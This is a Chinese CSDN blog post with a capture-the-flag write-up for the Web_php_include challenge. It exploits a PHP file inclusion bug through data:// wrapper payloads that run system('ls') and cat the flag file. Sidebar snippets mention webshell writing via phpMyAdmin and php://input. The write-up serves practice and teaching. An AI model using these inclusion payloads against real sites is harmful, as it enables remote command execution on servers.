攻防世界-WEB-Web_php_include

最新推荐文章于 2024-09-12 09:31:27 发布

Lucifer_wei

最新推荐文章于 2024-09-12 09:31:27 发布

阅读量512

点赞数

分类专栏： CTF练习册文章标签： php 开发语言

本文链接：https://blog.csdn.net/w632138645/article/details/132707274

版权

CTF练习册专栏收录该内容

18 篇文章 0 订阅

订阅专栏

打开靶机

通过代码审计可以知道，存在文件包含漏洞，并且对伪协议php://进行了过滤。

发现根目录下存在phpinfo

观察phpinfo发现如下：

这两个都为on

所以我们就可以使用data://伪协议

payload如下：

- ?page=data://text/plain,<?phpsystem("ls")?>- ?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=    #base64编码

访问新连接

上面的payload就可以实现命令执行了

找了半天发现flag在fl4gisisish3r3.php文件中

使用如下payload就可以获取flag了

?page=data://text/plain,<?phpsystem("cat fl4gisisish3r3.php")?>

使用该命令获取的flag被隐藏了，直接在web界面找不到，可以通过查看网页源代码查看

拿到flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Lucifer_wei

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

攻防世界(web篇)---Web_php_include

飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘

06-07

3604

hello传值 phpmyadmin写马 phpmyadmin变量secure_file_priv值为空，说明可以写入一句话木马传🐎成功测试🐎php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行利用该方法，我们可以直接写入php文件，输入file=php://input，然后使用burp抓包，写入php代码： file://协议用于访问本地文件系统，不受allow_url_fopen与allow_url_include的影响即file:// [文..

【网络安全 | CTF】攻防世界 Web_php_include【php伪协议|data伪协议|file伪协议】

等风来

05-22

9932

是 PHP 语言中一个重要的文件包含机制，可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发，在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件，可以在 web 页面中链接到本地文件，或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议，可以绕过通常的协议限制，直接访问本地文件和执行 PHP 代码。函数，该函数返回当前工作目录的绝对路径。函数，该函数返回当前执行的 PHP 脚本所在位置的绝对路径。

1 条评论您还未登录，请先登录后发表或查看评论

攻防世界-web-Web_php_include

wuh2333的博客

05-18

210

攻防世界，php_web_include

攻防世界-web Web_php_include

m0_48108919的博客

02-10

1300

根据题目这题应该要用到php文件包含分析代码： strstr() 函数用法：搜索字符串在另一字符串中是否存在，如果是，返回该字符串及剩余部分，否则返回 FALSE（该函数是区分大小写的） //例如： echo strstr("Hello world!","world"); // 输出 world! str_replace() 函数用法：替换字符串中的一些字符（区分大小写） //例如： echo str_replace("world","Peter","Hello world!"); //输出Hell

攻防世界---Web_php_include

2201_75556700的博客

04-14

627

6.构造下面url，读取fl4gisisish3r3.php内容。5构造下面url，读取该路径的文件。4.构造下面url，得到目录路径。在网页上显示文本。

ctf-攻防世界-web：Web_php_include

一只菜鸟的博客

11-21

5865

先看题目标题，php_include，猜测为文件包含漏洞。打开环境，看到这样一段代码：

攻防世界：WEB——Web_php_include

Zeker62的博客

08-16

470

借鉴了别人的博客：https://www.cnblogs.com/xhds/p/12218471.html但是还是要自己总结一下源代码是这样的 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 这里有几个函

ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)

05-13

在 PHP 中，当我们使用 include 或 require 语句来引入文件时，如果我们没有对输入进行过滤，就会存在文件包含漏洞。在这道题目中，我们需要绕过一个筛选器，使得可以包含 flag.php 文件。具体的步骤如下： 1. ...

攻防世界 -- fileinclude

weixin_48031371的博客

09-14

3323

攻防世界 -- fileinclude

攻防世界 Web_php_unserialize

beiweixiaotian66的博客

09-07

804

因为GET传参还要经过一个Base64的解码，所以对这个表达式还要经过base64的加密。因为前面还有个正则表达式，所以我们还需要绕过这个正则表达式，使用。然后我们知道怎么绕过了，可不可以直接自己手动绕过，base加密捏。如果表示对象属性个数的值大于真实的属性个数时，就可以绕过。代表着后面的变量名长度应是10，但好像只有八位？表示空字符，但是还是占用一个字符位置。但是这样的base和上面不一样。，这样base出来就是一样的了。方法，写一个反序列化的脚本。这道题我们需要的文件是。,所以我们主要需要绕过。

以太坊开发环境

禅与代码的艺术

09-07

1359

详细讨论了以太坊测试网络和私有网络。在初步介绍了私有网络设置之后，演示了如何使用 Geth 命令行工具执行各种功能，以及如何与以太坊区块链进行交互。还讨论了如何使用 Mist 来部署合约和发送交易。

Thinkphp5实现一周签到打卡功能

Crazy_shark的博客

09-10

624

以上是一个简单的 ThinkPHP5 实现一周签到打卡功能的示例。通过设计合适的数据库结构和控制器逻辑，你可以轻松实现用户签到和连续签到天数统计功能。在实际应用中，可能需要考虑更多的细节，如用户身份验证、签到奖励、接口优化等。

【2025】基于PHP职业病健康管理系统（源码+论文+部署讲解等）

程序员阿龙的博客

09-10

1741

博主介绍： ✌我是阿龙，一名专注于Java技术领域的程序员，全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师，我在计算机毕业设计开发方面积累了丰富的经验。同时，我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导，我致力于帮助更多学生完成毕业项目和技术提升。技术范围：我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方

PLC(电力载波通信)网络机制介绍

u010467490的博客

09-08

1240

电力载波通讯即PLC，是英文Power line Carrier的简称。电力载波是电力系统特有的通信方式，电力载波通讯是指利用现有电力线，通过载波方式将模拟或数字信号进行高速传输的技术。最大特点是不需要重新架设网络，只要有电线，就能进行数据传递。CCO在所有相线上工作，STA只在一个相线上工作，不同相位具有不同的过零时间，CCO通过采集STA的过零时间确定STA的相位时分多址传输，设备独占间隙，数据包根据指定时间进行发送载波侦听多路访问/冲突检测，设备共同占有间隙，判断信道空闲，竞争进行发送。

第四届长城杯部分wp

weixin_74427106的博客

09-09

733

还是太菜了，要经常练了。

搭建 WordPress 及常见问题与解决办法

hacker__的博客

09-10

1050

本文旨在介绍如何在服务器上搭建 WordPress 网站，并提供一些常见问题的解决办法。

PHP随时随地预订民宿酒店预订系统小程序源码